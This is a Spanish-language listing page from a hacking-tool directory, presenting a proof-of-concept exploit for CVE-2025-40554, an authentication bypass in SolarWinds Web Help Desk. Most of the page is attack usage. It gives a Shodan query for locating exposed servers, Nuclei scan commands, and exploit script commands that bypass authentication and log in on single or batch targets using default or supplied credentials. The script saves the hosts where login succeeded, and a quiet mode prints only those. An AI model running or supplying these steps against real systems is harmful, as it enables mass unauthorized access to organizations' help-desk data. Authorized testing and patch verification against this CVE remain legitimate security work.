Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
auth-bypass-CVE-2025-40554 — Exploit de prueba de concepto para CVE-2025-40554, una omisión de autenticación en SolarWinds Web Help Desk. Incluye plantilla Nuclei y exploit Python para pruebas en objetivos individuales o por lotes con inicio de sesión opcional mediante credenciales. | Kitploit
Herramientas/GitHubGitHub/imbas007/auth-bypass-cve-2025-40554
Autenticación y AutorizaciónEscáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubimbas007/auth-bypass-cve-2025-40554

auth-bypass-CVE-2025-40554

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit de prueba de concepto para CVE-2025-40554, una omisión de autenticación en SolarWinds Web Help Desk. Incluye plantilla Nuclei y exploit Python para pruebas en objetivos individuales o por lotes con inicio de sesión opcional mediante credenciales.

Ver Repositorio
19hace 8 mesesAún no revisado

CVE-2025-40554 – PoC de Omisión de Autenticación de SolarWinds Web Help Desk

Consulta de shodan

http.favicon.hash:"1895809524"

Nuclei

nuclei -u https://TARGET:8443 -t CVE-2025-40554.yaml
nuclei -l list_target.txt -t CVE-2025-40554.yaml
pip install -r requirements.txt

Uso

Objetivo único (bypass + inicio de sesión, por defecto cliente/cliente):

python3 exploit_auth_bypass.py -t https://TARGET:8443
image

Objetivo único con credenciales personalizadas:

python3 exploit_auth_bypass.py -t https://TARGET:8443 -u myuser -p mypass

Objetivo único, solo bypass (sin inicio de sesión):

python3 exploit_auth_bypass.py -t https://TARGET:8443 --no-login

Lista de objetivos (guarda solo vulnerable+inicio de sesión):

python3 exploit_auth_bypass.py -l result_all.txt
python3 exploit_auth_bypass.py -l targets.txt -o my_login_ok.txt

Lista de objetivos con credenciales personalizadas:

python3 exploit_auth_bypass.py -l targets.txt -u admin -p secret

Modo silencioso (imprime solo URLs donde el inicio de sesión fue exitoso):

python3 exploit_auth_bypass.py -l result_all.txt -q

Descargo de responsabilidad

Este PoC es solo para investigación y pruebas de seguridad autorizadas. El acceso no autorizado a sistemas informáticos es ilegal. Los autores no son responsables del mal uso.

Descargar herramienta